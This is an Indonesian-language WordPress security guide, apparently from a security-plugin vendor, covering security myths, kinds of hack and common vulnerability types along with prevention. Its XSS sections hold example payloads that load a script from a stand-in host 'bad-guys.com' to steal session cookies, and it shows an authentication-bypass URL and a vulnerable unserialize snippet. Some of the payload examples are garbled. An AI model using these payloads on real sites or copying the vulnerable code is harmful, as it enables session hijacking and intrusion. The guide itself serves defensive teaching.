Keamanan WordPress: Panduan Utama

Keamanan WordPress dapat mengintimidasi, tetapi tidak harus begitu. Dalam panduan komprehensif untuk keamanan WordPress ini, kami telah menyederhanakan dasar-dasar mengamankan situs WordPress Anda sehingga setiap orang non-teknis dapat memahami dan melindungi situs web mereka dari serangan peretas.

Panduan keamanan WordPress ini dipecah menjadi 10 bagian yang mudah dicerna. Setiap bagian akan memandu Anda melalui aspek tertentu dari keamanan WordPress. Di akhir panduan ini, Anda akan mempelajari berbagai jenis kerentanan, motif peretas, dan cara mengamankan semuanya, mulai dari server Anda hingga pengguna individual situs web WordPress Anda.

Mari selami!

Bagian 1: Apakah WordPress Aman?

Apakah WordPress aman? Jawaban singkatnya adalah ya.

Apakah WordPress Memiliki Masalah Keamanan?

Meskipun WordPress sendiri aman, menghindari kesalahan keamanan WordPress memerlukan sedikit usaha dari pemilik situs. Yang benar adalah bahwa masalah keamanan WordPress terbesar adalah penggunanya. Sebagian besar peretasan WordPress di platform dapat dihindari dengan sedikit usaha dari pemilik situs.

Jangan khawatir, kami telah membantu Anda. Panduan ini akan mengajarkan Anda semua yang perlu Anda ketahui tentang menjaga keamanan situs web Anda.

Sebelum kami dapat mengamankan situs web kami, pertama-tama kami harus memahami lima hal.

1. Mengapa peretas menyerang situs web
2. Berbagai jenis peretasan WordPress
3. Jenis kerentanan WordPress tertentu
4. Bagaimana mencegah kerentanan WordPress
5. Cara menentukan tingkat keparahan kerentanan

Mengapa Seorang Peretas Menyerang Situs Web Saya?

Ini adalah pertanyaan keamanan WordPress umum yang mungkin Anda tanyakan ketika mimpi buruk terburuk Anda mulai menjadi kenyataan. Mengapa seorang peretas menyerang situs web saya? Yakinlah, kemungkinan serangan itu bersifat pribadi sangat kecil. Peretas memiliki motif mendasar yang tidak ada hubungannya dengan konten situs web Anda. Peretas biasanya tidak peduli apakah situs web Anda adalah laman amal untuk anak anjing tunawisma atau situs dengan banyak barang dagangan keren untuk dijual.

Namun, sulit untuk tidak merasa ditargetkan ketika identitas tak berwajah telah diretas ke situs web Anda, menyebabkan kekacauan dan kekacauan. Anda merasa stres, dan situasinya seperti berputar di luar kendali Anda. Anda merasa diserang secara pribadi dan bertanya-tanya apakah ada cara untuk menghentikan serangan itu terjadi. Anda bahkan mungkin bertanya-tanya apakah ada yang menyelamatkan reruntuhan situs web Anda.

Jadi, apa yang membuat seorang hacker mengincar sebuah website? Ini tidak ada hubungannya dengan situs web Anda, topik apa yang dicakupnya atau semacamnya. Pada kenyataannya, peretas menargetkan perangkat lunak yang digunakan situs web Anda untuk tetap aktif dan berjalan. Dengan meretas perangkat lunak ini, mereka dapat mencuri data sensitif pelanggan atau bahkan mengendalikan situs WordPress Anda.

Sayangnya, dengan popularitasnya yang semakin meningkat, WordPress juga menjadi incaran para hacker. Jika plugin WordPress populer memiliki kerentanan serius, peretas berpotensi memiliki rencana untuk mengambil alih ratusan ribu, jika bukan jutaan situs web. Untungnya, sebagian besar kerentanan plugin dengan cepat ditambal oleh pengembangnya.

Dengan dapat memperoleh informasi sensitif dan pribadi, peretas kemudian dapat menjualnya untuk mendapatkan penghasilan atau bahkan menahan tebusan data, yang pada dasarnya membuat orang membayar untuk mendapatkan kembali informasi mereka di tangan yang aman.

Jadi, apa motivasi utama para hacker?

Untuk menciptakan arus kas untuk diri mereka sendiri.

Internet adalah tempat yang menguntungkan yang menawarkan semua lapisan masyarakat kesempatan untuk menghasilkan upah yang layak. Namun, itu tidak berarti semua orang melakukan ini dengan cara yang legal dan moralistik. Peretas menghasilkan keuntungan tinggi bahkan dari situs web terkecil sekalipun.

Uang adalah semua motivasi yang mereka butuhkan, tetapi beberapa menikmati perasaan kekuatan yang mereka dapatkan ketika mereka berhasil menembus situs web, tetapi sebagian besar berada dalam bisnis semata-mata untuk uang tunai.

Bagian 2: 5 Mitos Keamanan WordPress Teratas Dibongkar

Sebelum kita masuk ke sisa panduan Keamanan WordPress ini, mari kita luangkan waktu sebentar untuk menghilangkan prasangka beberapa mitos keamanan WordPress.

Anda akan menemukan banyak saran keamanan WordPress yang beredar di internet dari orang-orang yang bermaksud baik yang benar-benar ingin membantu. Sayangnya, beberapa saran ini dibuat berdasarkan mitos keamanan WordPress dan tidak benar-benar menambahkan keamanan tambahan apa pun ke situs web WordPress Anda. Faktanya, beberapa “tips” keamanan WordPress dapat meningkatkan kemungkinan Anda mengalami masalah dan konflik.

Kami memiliki banyak mitos keamanan WordPress untuk dipilih, tetapi kami hanya akan fokus pada 5 teratas yang secara konsisten kami lihat di lebih dari 30.000 tiket dukungan. Percakapan dengan pelanggan kami ini digunakan sebagai dasar kriteria berikut untuk memilih mitos keamanan WordPress teratas:

1. Frekuensi mitos itu disebutkan.
2. Jumlah sakit kepala yang disebabkan oleh mitos.
3. Rasa aman palsu yang diberikan mitos.

1. Anda Harus Menyembunyikan URL /wp-admin atau /wp-login Anda (Juga Dikenal Sebagai Sembunyikan Backend)

Gagasan di balik menyembunyikan wp-admin adalah bahwa peretas tidak dapat meretas apa yang tidak dapat mereka temukan. Jika URL login Anda bukan URL /wp-admin/ WordPress standar, bukankah Anda terlindungi dari serangan brute force?

Yang benar adalah bahwa sebagian besar fitur Sembunyikan Backend hanyalah keamanan melalui ketidakjelasan, yang bukan merupakan strategi keamanan WordPress anti peluru. Meskipun menyembunyikan URL wp-admin backend Anda dapat membantu mengurangi beberapa serangan pada login Anda, pendekatan ini tidak akan menghentikan semuanya.

Kami sering menerima tiket dukungan dari orang-orang yang bingung bagaimana iThemes Security Pro melaporkan upaya login yang tidak valid ketika mereka menyembunyikan login mereka. Itu karena ada cara lain untuk masuk ke situs WordPress Anda selain menggunakan browser, seperti menggunakan XML-RPC atau REST API. Belum lagi setelah mengubah URL login, plugin atau tema lain masih dapat menautkan ke URL baru.

Faktanya, fitur Hide Backend tidak terlalu mengubah apapun. Ya, itu mencegah sebagian besar pengguna mengakses langsung URL login default. Tetapi setelah seseorang memasukkan URL login khusus, mereka diarahkan kembali ke URL login WordPress default.

Menyesuaikan URL login juga diketahui menyebabkan konflik. Ada beberapa plugin, tema, atau aplikasi pihak ketiga yang mengkodekan wp-login.php ke dalam basis kode mereka. Jadi, ketika perangkat lunak yang di-hardcode mencari situsAnda.com/wp-login.php, ia malah menemukan kesalahan.

2. Anda Harus Menyembunyikan Nama Tema dan Nomor Versi WordPress Anda

Jika Anda menggunakan alat pengembang browser, Anda dapat dengan cepat melihat nama tema dan nomor versi WordPress yang berjalan di situs WordPress. Teori di balik menyembunyikan nama tema dan versi WP Anda adalah bahwa jika penyerang memiliki informasi ini, mereka akan memiliki cetak biru untuk membobol situs Anda.

Misalnya, melihat tangkapan layar di atas, Anda dapat melihat situs ini menggunakan Twenty Twenty-One dan versi WordPress adalah 5.6.

Masalah dengan mitos keamanan WordPress ini adalah bahwa tidak ada orang di balik keyboard yang mencari kombinasi sempurna antara tema dan nomor versi WordPress untuk diserang. Namun, ada bot ceroboh yang menjelajahi internet mencari kerentanan yang diketahui dalam kode aktual yang berjalan di situs web Anda, jadi menyembunyikan nama tema dan nomor versi WP tidak akan melindungi Anda.

3. Anda Harus Mengganti Nama Direktori wp-content Anda

Direktori wp-content berisi plugin, tema, dan folder unggahan media Anda. Itu adalah banyak hal bagus dan kode yang dapat dieksekusi semuanya dalam satu direktori, jadi dapat dimengerti bahwa orang ingin proaktif dan mengamankan folder ini.

Sayangnya, itu adalah mitos keamanan WordPress bahwa mengubah nama konten-wp akan menambah lapisan keamanan ekstra ke situs. Tidak akan. Kami dapat dengan mudah menemukan nama direktori konten-wp Anda yang diubah dengan menggunakan alat pengembang browser. Pada tangkapan layar di bawah ini kita dapat melihat bahwa saya mengganti nama direktori konten situs ini menjadi /test/.

Mengubah nama direktori tidak akan menambah keamanan apa pun ke situs Anda, tetapi dapat menyebabkan konflik untuk plugin yang memiliki jalur direktori /wp-content/ hardcoded.

4. Website Saya Tidak Cukup Besar untuk Mendapat Perhatian dari Hacker

Mitos keamanan WordPress ini membuat banyak situs rentan terhadap serangan. Bahkan jika Anda adalah pemilik situs kecil dengan lalu lintas rendah, tetap penting bagi Anda untuk proaktif dalam mengamankan situs web Anda.

Bahkan jika Anda adalah pemilik situs kecil dengan lalu lintas rendah, tetap penting bagi Anda untuk proaktif dalam mengamankan situs web Anda.

Yang benar adalah situs atau bisnis Anda tidak harus besar untuk menarik perhatian calon penyerang. Peretas masih melihat peluang untuk menggunakan situs Anda sebagai saluran untuk mengarahkan beberapa pengunjung Anda ke situs jahat, mengirim spam dari server surat Anda, menyebarkan virus, atau bahkan menambang Bitcoin. Mereka akan mengambil apapun yang bisa mereka dapatkan.

5. WordPress adalah Platform yang Tidak Aman

Mitos keamanan WordPress yang paling merusak adalah WordPress itu sendiri tidak aman. Ini tidak benar. WordPress adalah sistem manajemen konten paling populer di dunia, dan hal itu tidak terjadi karena tidak memperhatikan keamanan secara serius.

Bagian 3: Peretasan WordPress & Kerentanan WordPress

4 Jenis Peretasan WordPress

Dalam hal memahami keamanan WordPress, penting untuk dipahami

1. Spam SEO

Motivasi lain bagi peretas untuk menyerang situs web Anda adalah untuk mendapatkan manfaat dari spam SEO. SEO, atau optimisasi mesin pencari, adalah apa yang digunakan mesin pencari untuk mengindeks, atau memberi peringkat, situs web Anda. Dengan menggunakan kata kunci tertentu, ditempatkan secara strategis di halaman web dan posting blog Anda, Anda dapat membantu peringkat situs web Anda lebih tinggi dalam pencarian Google. Ini akan mengarahkan lalu lintas ke situs web Anda dan dapat membantu Anda menghasilkan keuntungan yang sepadan dengan waktu Anda.

Peretas tahu semua tentang SEO, dan mereka menggunakannya untuk keuntungan mereka. Ketika situs web Anda telah disusupi, peretas akan memasang pintu belakang ke situs web Anda. Ini memungkinkan mereka untuk mengontrol kata kunci dan konten situs web Anda dari jarak jauh. Mereka akan sering mengarahkan lalu lintas dari situs web Anda, menyalurkannya langsung ke situs mereka, melewati situs Anda sepenuhnya.

Ini akan membuat audiens target Anda bingung dan frustrasi, menghancurkan reputasi dan kredibilitas situs web Anda. Pengunjung situs web Anda akan sering diarahkan ke situs yang jelas-jelas scam, dan mereka akan ragu untuk mengunjungi kembali situs web Anda di masa mendatang.

Seolah itu belum cukup buruk, peretas yang menggunakan pendekatan ini membuat situs web Anda terlihat buruk di mesin pencari, bukan hanya sesama manusia. Situs web Anda tidak akan lagi terlihat sah, dan peringkatnya akan turun dengan cepat. Tanpa peringkat tinggi dalam pencarian, situs Anda akan menjadi salah satu dari jutaan yang tidak pernah mendapatkan lebih dari beberapa hits per bulan.

2. Suntikan Malware

Banyak peretas menyerang situs web Anda, berniat menginfeksinya dengan malware. Malware adalah potongan kecil kode yang dapat digunakan untuk membuat perubahan berbahaya di situs web Anda. Jika situs Anda terinfeksi malware, penting untuk diberi tahu sesegera mungkin.

Setiap menit malware itu tetap berada di situs web Anda, itu melakukan lebih banyak kerusakan pada situs web Anda. Semakin banyak kerusakan yang terjadi pada situs web Anda, semakin lama waktu yang dibutuhkan untuk membersihkan dan memulihkan situs web Anda. Sangat penting untuk memeriksa kesehatan situs web Anda dengan memindai malware secara teratur. Inilah sebabnya mengapa sangat penting untuk terus memeriksa kesehatan situs web Anda dengan memindai malware.

3. Ransomware

Seorang peretas mungkin ingin menyerang situs web Anda untuk meminta tebusan. Ransomware mengacu pada saat peretas mengambil alih situs web Anda tidak akan melepaskannya kembali kepada Anda kecuali Anda membayar mereka dengan biaya yang besar. Waktu henti rata-rata serangan ransomware adalah 9,5 hari. Berapa banyak pendapatan yang akan dikenakan biaya penjualan selama 10 hari NO?

Rata-rata tebusan yang diminta peretas telah meningkat secara dramatis, dari $294 pada tahun 2015 menjadi lebih dari $13.000 pada tahun 2020. Dengan pembayaran semacam ini, bisnis kejahatan online tidak melambat. Menjadi semakin penting untuk mengamankan dan melindungi situs web Anda dengan benar seiring berkembangnya komunitas kejahatan seperti ini.

4. Pengrusakan Situs Web

Beberapa peretas mungkin menyerang situs web Anda untuk sedikit bersenang-senang. Gaya peretasan yang secara inheren tidak terlalu jahat adalah perusak situs web. Ini biasanya anak-anak atau dewasa muda yang baru mulai bermain-main dengan keterampilan meretas mereka. Mereka melakukan peretasan seperti ini sebagai cara untuk berlatih dan meningkatkan keterampilan mereka.

Ketika kita berbicara tentang situs web yang dirusak, pikirkan tentang grafiti. Penyerang akan sepenuhnya mengubah tampilan situs web Anda, terkadang dengan cara yang menyenangkan atau aneh. Defacer situs web biasa melakukan perbuatan mereka untuk bersenang-senang atau sebagai cara untuk pamer. Mereka akan sering memposting foto-foto kelakuan buruk mereka, mencoba saling melengkapi untuk memenangkan hadiah deface terbaik.

Kabar baiknya, bentuk peretasan ini tidak terlalu berbahaya untuk Anda alami. Selain itu, karena sebagian besar remaja dan peretas amatir lainnya melakukan perusakan, mereka lebih mudah dideteksi dan dihapus dari situs web Anda jika dibandingkan dengan bentuk malware lainnya. Mereka biasanya dapat dideteksi oleh pemindai dan dihapus dengan cepat.

21 Penjelasan Umum Kerentanan WordPress

Sayangnya, ada kerentanan WordPress. Kerentanan WordPress bisa ada di plugin Anda, tema Anda, dan bahkan inti WordPress. Dan karena WordPress sekarang mendukung hampir 40% dari semua situs web, tugas memahami kerentanan menjadi lebih penting. Sederhananya: Anda harus waspada dengan keamanan situs web Anda.

Jika Anda bukan ahli keamanan WordPress, memahami semua berbagai kerentanan WordPress bisa menjadi hal yang menakutkan. Mungkin juga sulit untuk mencoba memahami berbagai tingkat keparahan kerentanan, bersama dengan risiko kerentanan WordPress.

Panduan ini akan mendefinisikan 21 kerentanan WordPress yang paling umum, mencakup cara menilai tingkat keparahan kerentanan WordPress, memberikan contoh bagaimana peretas dapat mengeksploitasi kerentanan, dan menunjukkan bagaimana kerentanan ini dapat dicegah. Mari selami.

Apa itu Kerentanan WordPress?

Kerentanan WordPress adalah kelemahan atau cacat pada tema, plugin, atau inti WordPress yang dapat dimanfaatkan oleh peretas. Dengan kata lain, kerentanan WordPress membuat titik masuk yang dapat digunakan peretas untuk melakukan aktivitas jahat.

Perlu diingat bahwa peretasan situs web hampir semuanya otomatis. Karena itu, peretas dapat dengan mudah membobol sejumlah besar situs web dalam waktu singkat. Peretas menggunakan alat khusus yang memindai internet, mencari kerentanan yang diketahui.

Peretas menyukai sasaran empuk, dan memiliki situs web yang menjalankan perangkat lunak dengan kerentanan yang diketahui seperti memberikan petunjuk langkah demi langkah kepada peretas untuk membobol situs web WordPress, server, komputer, atau perangkat lain yang terhubung ke internet.

Laporan pengumpulan kerentanan WordPress bulanan kami mencakup semua inti WordPress, plugin WordPress, dan kerentanan tema yang diungkapkan secara publik. Dalam ringkasan ini, kami membagikan nama plugin atau tema yang rentan, versi yang terpengaruh, dan jenis kerentanannya.

Apa itu Kerentanan Zero-Day?

Ketika berbicara tentang keamanan WordPress, penting untuk memahami definisi kerentanan zero-day. Karena kerentanan diungkapkan kepada publik, pengembang memiliki waktu nol hari untuk menambal kerentanan. Dan ini dapat memiliki implikasi besar untuk plugin dan tema Anda.

Biasanya, seorang peneliti keamanan akan menemukan kerentanan dan secara pribadi mengungkapkan kerentanan tersebut kepada pengembang perusahaan yang memiliki perangkat lunak tersebut. Peneliti keamanan dan pengembang setuju bahwa detail lengkap akan dipublikasikan setelah patch tersedia. Mungkin ada sedikit keterlambatan dalam mengungkapkan kerentanan setelah tambalan dirilis untuk memberi lebih banyak waktu bagi orang untuk memperbarui kerentanan keamanan utama.

Namun, jika pengembang tidak menanggapi peneliti keamanan atau gagal memberikan tambalan untuk kerentanan, maka peneliti dapat mengungkapkan kerentanan secara terbuka untuk memberi tekanan pada pengembang untuk mengeluarkan tambalan.

Mengungkapkan kerentanan secara publik dan tampaknya memperkenalkan zero-day mungkin tampak kontraproduktif. Tapi, itu adalah satu-satunya pengaruh yang dimiliki peneliti untuk menekan pengembang untuk menambal kerentanan.

Project Zero Google memiliki pedoman serupa dalam hal mengungkapkan kerentanan. Mereka mempublikasikan rincian lengkap kerentanan setelah 90 hari. Apakah kerentanan telah ditambal atau tidak.

Kerentanan ada untuk ditemukan oleh siapa saja. Jika seorang peretas menemukan kerentanan sebelum pengembang merilis tambalan, itu menjadi mimpi buruk terburuk bagi pengguna akhir…. Zero-day yang dieksploitasi secara aktif.

Apa itu Kerentanan Zero-Day yang Dieksploitasi Secara Aktif?

Kerentanan Zero-Day yang Dieksploitasi secara Aktif adalah persis seperti apa kedengarannya. Ini adalah kerentanan yang belum ditambal yang ditargetkan, diserang, dan dieksploitasi secara aktif oleh peretas.

Pada akhir 2018, peretas secara aktif mengeksploitasi kerentanan WordPress yang serius di plugin Kepatuhan WP GDPR. Eksploitasi memungkinkan pengguna yang tidak sah — lebih lanjut tentang ini di bagian berikutnya — untuk mengubah pengaturan pendaftaran pengguna WP dan mengubah peran pengguna baru default dari pelanggan menjadi administrator.

Peretas ini menemukan kerentanan ini sebelum plugin Kepatuhan WP GDPR dan peneliti keamanan. Jadi, situs web apa pun yang memasang plugin adalah tanda yang mudah dan terjamin bagi penjahat dunia maya.

Bagaimana Melindungi Diri Anda Dari Kerentanan Zero-Day

Cara terbaik untuk melindungi situs web Anda dari kerentanan Zero-Day adalah dengan menonaktifkan dan menghapus perangkat lunak hingga kerentanan ditambal. Untungnya, pengembang plugin Kepatuhan WP GDPR bertindak cepat dan merilis tambalan untuk kerentanan sehari setelah diungkapkan secara publik.

Kerentanan yang tidak ditambal membuat situs web Anda menjadi sasaran empuk bagi peretas.

Kerentanan WordPress yang Tidak Diautentikasi vs. yang Diautentikasi

Ada dua istilah lagi yang perlu Anda ketahui ketika berbicara tentang kerentanan WordPress.

1. Tidak Diautentikasi – Kerentanan WordPress yang tidak diautentikasi berarti siapa pun dapat mengeksploitasi kerentanan.
2. Diotentikasi – Kerentanan WordPress yang diautentikasi berarti memerlukan pengguna yang masuk untuk mengeksploitasi.

Kerentanan yang memerlukan pengguna yang diautentikasi jauh lebih sulit untuk dieksploitasi oleh peretas, terutama jika memerlukan hak istimewa tingkat admin. Dan, jika seorang peretas sudah memiliki satu set kredensial admin, mereka benar-benar tidak perlu mengeksploitasi kerentanan untuk mendatangkan malapetaka.

Ada satu peringatan. Beberapa kerentanan yang diautentikasi hanya memerlukan kemampuan tingkat pelanggan untuk dieksploitasi. Jika situs web Anda mengizinkan siapa pun untuk mendaftar, sebenarnya tidak ada banyak perbedaan antara kerentanan ini dan kerentanan yang tidak diautentikasi.

Dalam hal kerentanan WordPress, ada 21 jenis kerentanan yang umum. Mari kita bahas masing-masing jenis kerentanan WordPress ini.

1. Bypass Otentikasi

Kerentanan Bypass Otentikasi memungkinkan penyerang untuk melewati persyaratan otentikasi dan melakukan tugas yang biasanya disediakan untuk pengguna yang diautentikasi.

Otentikasi adalah proses verifikasi identitas pengguna. WordPress mengharuskan pengguna untuk memasukkan nama pengguna dan kata sandi untuk memverifikasi identitas mereka.

Contoh Bypass Otentikasi

Aplikasi memverifikasi otentikasi berdasarkan serangkaian parameter tetap. Penyerang dapat memodifikasi parameter ini untuk mendapatkan akses ke halaman web yang biasanya memerlukan autentikasi.

Contoh yang sangat mendasar dari sesuatu seperti ini adalah parameter otentikasi di URL.

 https:/my-website/some-plugint?param=authenticated&param=no

URL di atas memiliki parameter autentikasi yang memiliki nilai no. Jadi ketika kami mengunjungi halaman ini, kami akan disajikan dengan pesan yang memberi tahu kami bahwa kami tidak diizinkan untuk melihat informasi di halaman ini.

Namun, jika pemeriksaan otentikasi dikodekan dengan buruk, penyerang dapat mengubah parameter otentikasi untuk mendapatkan akses ke halaman pribadi.

 https:/my-website/some-plugint?param=authenticated&param=yes

Dalam contoh ini, peretas dapat mengubah nilai autentikasi di URL menjadi ya untuk mengabaikan persyaratan autentikasi untuk melihat halaman.

Cara Mencegah Pencegahan Bypass Otentikasi

Anda dapat membantu melindungi situs web Anda dari kerentanan Otentikasi Rusak dengan menggunakan autentikasi dua faktor.

2. Kerentanan Pintu Belakang

Kerentanan Backdoor memungkinkan pengguna yang berwenang dan tidak sah untuk melewati langkah-langkah keamanan WordPress normal dan mendapatkan akses tingkat tinggi ke komputer, server, situs web, atau aplikasi.

Contoh Pintu Belakang

Pengembang membuat pintu belakang sehingga mereka dapat dengan cepat beralih antara pengkodean dan pengujian kode sebagai pengguna admin. Sayangnya, pengembang lupa untuk menghapus backdoor sebelum perangkat lunak dirilis ke publik.

Jika peretas menemukan pintu belakang, mereka dapat mengeksploitasi titik masuk untuk mendapatkan akses admin ke perangkat lunak. Sekarang peretas memiliki akses admin, mereka dapat melakukan segala macam hal jahat seperti menyuntikkan malware atau mencuri data sensitif.

Cara Mencegah Pintu Belakang

Banyak backdoor dapat diringkas menjadi satu masalah, kesalahan konfigurasi keamanan. Masalah kesalahan konfigurasi keamanan WordPress dapat dikurangi dengan menghapus semua fitur yang tidak digunakan dalam kode, menjaga semua perpustakaan tetap mutakhir, dan membuat pesan kesalahan lebih umum.

3. Kerentanan Objek-Injeksi PHP

Kerentanan PHP Object-Injection terjadi dengan pengguna mengirimkan input yang tidak disanitasi (artinya karakter ilegal tidak dihapus) sebelum diteruskan ke fungsi PHP unserialized() .

Contoh Injeksi Objek PHP

Berikut adalah contoh nyata dari kerentanan PHP Object-Injection di plugin Sample Ads Manager WordPress yang awalnya dilaporkan oleh sumofpwn.

Masalahnya adalah karena dua panggilan tidak aman ke unserialize() dalam file plugin sam-ajax-loader.php . Input diambil langsung dari permintaan POST seperti yang dapat dilihat pada kode di bawah ini.

 if ( in_array( $action, $allowed_actions ) ) { switch ( $action ) { case 'sam_ajax_load_place': echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) ); break; case 'sam_ajax_load_ads': if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) { $clauses = **unserialize( base64_decode( $_POST['wc'] ) )**;

Masalah ini dapat mengakibatkan penyerang memasukkan dan mengeksekusi kode berbahaya.

Cara Mencegah Injeksi Objek PHP

Jangan gunakan fungsi unserialize() dengan input yang disediakan pengguna, gunakan fungsi JSON sebagai gantinya.

4. Kerentanan Scripting Lintas Situs

Kerentanan XSS atau Cross-Site Scripting terjadi saat aplikasi web mengizinkan pengguna untuk menambahkan kode kustom di jalur URL. Penyerang dapat mengeksploitasi kerentanan untuk menjalankan kode berbahaya di browser web korban, membuat pengalihan ke situs web berbahaya, atau membajak sesi pengguna.

Ada tiga jenis utama XSS, tercermin. disimpan, dan Berbasis DOM

5. Kerentanan Skrip Lintas Situs yang Tercermin

XSS Tercermin atau Skrip Lintas Situs Tercermin terjadi ketika skrip berbahaya dikirim dalam permintaan klien–permintaan yang Anda buat di browser–ke server dan dipantulkan kembali oleh server dan dijalankan oleh browser Anda.

Contoh Skrip Lintas Situs Tercermin

Katakanlah yourfavesite.com mengharuskan Anda masuk untuk melihat beberapa konten situs web. Dan katakanlah situs web ini gagal menyandikan input pengguna dengan benar.

Penyerang dapat memanfaatkan kerentanan ini dengan membuat tautan berbahaya dan membagikannya dengan pengguna situs yourfavesite.com melalui email dan pos media sosial.

Penyerang menggunakan alat pemendek URL untuk membuat tautan jahat terlihat tidak mengancam dan sangat dapat diklik, yourfavesite.com/cool-stuff . Namun, ketika Anda mengeklik tautan yang dipersingkat, tautan lengkapnya dijalankan oleh browser yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js .

Setelah mengklik link, Anda akan dibawa ke yourfavesite.com , dan skrip berbahaya akan ditampilkan kembali ke browser Anda, memungkinkan penyerang untuk membajak cookie sesi dan akun yourfavesite.com .

Cara Mencegah Skrip Lintas Situs yang Tercermin

Aturan #5 pada lembar contekan pencegahan cross-scripting OWASP adalah pengkodean URL sebelum memasukkan data yang tidak dipercaya ke dalam nilai parameter URL HTML. Aturan ini dapat membantu mencegah pembuatan kerentanan XSS yang direfleksikan saat menambahkan data yang tidak tepercaya ke dalam nilai parameter HTTP GET.

<a href="http://www.yourfavesite.com?test=...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

6. Kerentanan Scripting Lintas Situs Tersimpan

Kerentanan Stored XSS atau Stored Cross-Site Scripting memungkinkan peretas memasukkan kode berbahaya ke dalam dan menyimpannya di server aplikasi web.

Contoh Skrip Lintas Situs Tersimpan

Seorang penyerang menemukan bahwa yourfavesite.com mengizinkan pengunjung untuk menyematkan tag HTML di bagian komentar situs. Jadi penyerang membuat komentar baru:

Artikel bagus! Lihat artikel <script src=”http://bad-guys.com/passwordstealingcode.js> hebat terkait lainnya ini. </script>

Catatan: Kerentanan XSS yang tercermin akan mengharuskan pengunjung mengklik tautan kode berbahaya untuk mengeksekusi. Serangan XSS yang disimpan hanya membutuhkan halaman yang berisi komentar untuk dikunjungi. Kode berbahaya berjalan dengan setiap pemuatan halaman.

Sekarang orang jahat kami telah menambahkan komentar, setiap pengunjung halaman ini di masa mendatang akan terkena skrip jahat mereka. Script di-host di situs web orang jahat dan memiliki kemampuan untuk membajak cookie sesi pengunjung dan akun yourfavesite.com .

Bagaimana Mencegah Scripting Lintas Situs Tersimpan

Aturan #1 pada lembar contekan pencegahan cross-scripting OWASP adalah penyandian HTML sebelum menambahkan data yang tidak dipercaya ke dalam elemen HTML.

 <body> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </body>

 <div> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </div>

Mengkodekan karakter berikut untuk mencegah peralihan ke konteks eksekusi apa pun, seperti skrip, gaya, atau pengendali peristiwa. Menggunakan entitas hex direkomendasikan dalam spesifikasi.

 & --> &amp; < --> &lt; > --> &gt; " --> &quot; ' --> &#x27;

7. Kerentanan Skrip Lintas Situs Berbasis Model Objek Dokumen

Kerentanan XSS atau Document Object Model-Based Cross-Site Scripting berbasis DOM terjadi saat skrip sisi klien situs web menulis data yang disediakan pengguna ke Document Object Model (DOM). Situs web kemudian membaca tanggal pengguna dari DOM dan menampilkannya ke browser web pengunjung.

Jika data yang diberikan pengguna tidak ditangani dengan benar, penyerang dapat menyuntikkan kode berbahaya yang akan dieksekusi saat situs web membaca kode dari DOM.

Catatan: XSS Tercermin dan Tersimpan adalah masalah sisi server sedangkan XSS berbasis DOM adalah masalah klien (browser).

Contoh Skrip Lintas Situs Berbasis Model Objek Dokumen

Cara umum untuk menjelaskan serangan DOM XSS pada halaman selamat datang khusus. Setelah membuat akun, misalkan yourfavesite.com Anda diarahkan ke halaman selamat datang yang disesuaikan untuk menyambut Anda dengan nama menggunakan kode di bawah ini. Dan nama pengguna dikodekan ke dalam URL.

 <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+8; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to yourfavesite.com! … </HTML>

Jadi, kami akan memiliki URL yourfavesite.com/account?name=yourname .

Penyerang dapat melakukan serangan XSS berbasis DOM dengan mengirimkan URL berikut ke pengguna baru:

 http://yourfavesite.com/account?name=<script>alert(document.cookie)</script>

Saat pengguna baru mengklik tautan, browser mereka mengirim permintaan untuk:

 /account?name=<script>alert(document.cookie)</script>

ke bad-guys.com . Situs web merespons dengan halaman yang berisi kode Javascript di atas.

Browser pengguna baru membuat objek DOM untuk halaman, di mana objek document.location berisi string:

 http://www.bad-guys.com/account?name=<script>alert(document.cookie)</script>

Kode asli di halaman tidak mengharapkan parameter default berisi markup HTML, menggemakan markup ke halaman. Kemudian browser pengguna baru akan merender halaman dan mengeksekusi skrip penyerang:

 alert(document.cookie)

Cara Mencegah Skrip Lintas Situs Berbasis DOM

Aturan #1 pada lembar contekan pencegahan skrip lintas situs berbasis OWASP Dom adalah menghindari HTML. Kemudian, JS keluar sebelum menambahkan data yang tidak dipercaya ke dalam subkonteks HTML dalam konteks eksekusi.

Contoh Metode HTML Berbahaya:

Atribut

 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<HTML> Tags and markup";

Metode

 document.write("<HTML> Tags and markup"); document.writeln("<HTML> Tags and markup");

Untuk membuat pembaruan dinamis ke HTML di brankas DOM, OWASP merekomendasikan:

1. Pengkodean HTML, dan kemudian
2. JavaScript mengkodekan semua input yang tidak tepercaya, seperti yang ditunjukkan dalam contoh berikut:

 element.innerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"; element.outerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>";

 document.write("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"); document.writeln("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>");

8. Kerentanan Pemalsuan Permintaan Lintas Situs

Kerentanan CSRF atau Pemalsuan Permintaan Lintas Situs terjadi ketika penjahat dunia maya menipu pengguna untuk melakukan tindakan yang tidak diinginkan. Penyerang memalsukan permintaan pengguna ke aplikasi.

Contoh Pemalsuan Permintaan Lintas Situs

Dalam Roundup Kerentanan WordPress Januari 2020 kami, kami melaporkan kerentanan Pemalsuan Permintaan Lintas Situs yang ditemukan di plugin Cuplikan Kode. (Plugin dengan cepat ditambal di versi 2.14.0)

Kurangnya perlindungan CRSF plugin memungkinkan siapa pun untuk memalsukan permintaan atas nama administrator dan menyuntikkan kode yang dapat dieksekusi di situs yang rentan. Penyerang dapat memanfaatkan kerentanan ini untuk mengeksekusi kode berbahaya dan bahkan melakukan pengambilalihan situs secara menyeluruh.

Cara Mencegah Pemalsuan Permintaan Lintas Situs

Sebagian besar kerangka kerja pengkodean memiliki pertahanan token tersinkronisasi bawaan untuk melindungi dari CSRF, dan mereka harus digunakan.

Ada juga komponen eksternal seperti Proyek Pelindung CSRF yang dapat digunakan untuk melindungi kerentanan PHP dan Apache CSRF.

